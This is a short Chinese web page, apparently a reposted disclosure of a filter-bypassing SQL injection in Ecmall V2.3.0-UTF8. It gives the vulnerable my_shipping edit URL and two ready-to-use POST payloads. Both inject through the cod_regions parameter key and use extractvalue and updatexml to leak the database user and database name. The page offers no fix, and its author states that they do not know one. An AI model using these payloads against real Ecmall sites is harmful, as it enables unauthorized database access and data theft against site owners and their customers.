好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤) - 网

打了最新的补丁

绕过方法:

updatexml函数 extractvalue函数

url:  

http://localhost/ecmall/index.php?app=my_shipping&act=edit&shipping_id=1

payload1:  

shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or extractvalue(1,concat(0x5c,(select user())))#]=v

效果:  

payload2:  

shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or updatexml(2,concat(0x7e,(database())),0)#]=v

效果:  

 

修复方案:

我不知道

查看更多关于Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤) - 网的详细内容...

  阅读:116次